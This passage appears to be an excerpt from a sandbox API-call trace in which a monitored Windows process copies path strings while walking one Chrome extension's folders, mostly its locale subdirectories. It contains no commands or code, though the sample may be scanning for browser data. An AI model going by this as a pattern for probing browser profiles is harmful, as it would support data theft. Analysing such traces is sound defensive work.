iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda" [0111.396] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0" [0111.397] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata" [0111.397] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales" [0111.397] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW" [0111.398] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN" [0111.398] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi" [0111.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk" [0111.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr" [0111.400] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th" [0111.400] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv" [0111.400] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr" [0111.401] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl" [0111.401] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk" [0111.402] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru" [0111.402] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro" [0111.403] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT" [0111.403] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR" [0111.403] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl" [0111.404] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl" [0111.404] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb" [0111.405] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv" [0111.406] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt" [0111.406] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko" [0111.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja" [0111.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it" [0111.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id" [0111.408] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu" [0111.408] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr" [0111.409] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi" [0111.409] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr" [0111.411] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil" [0111.412] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi" [0111.412] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et" [0111.412] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419" [0111.413] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es" [0111.413] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB" [0111.414] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en" [0111.414] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el" [0111.414] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de" [0111.415] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 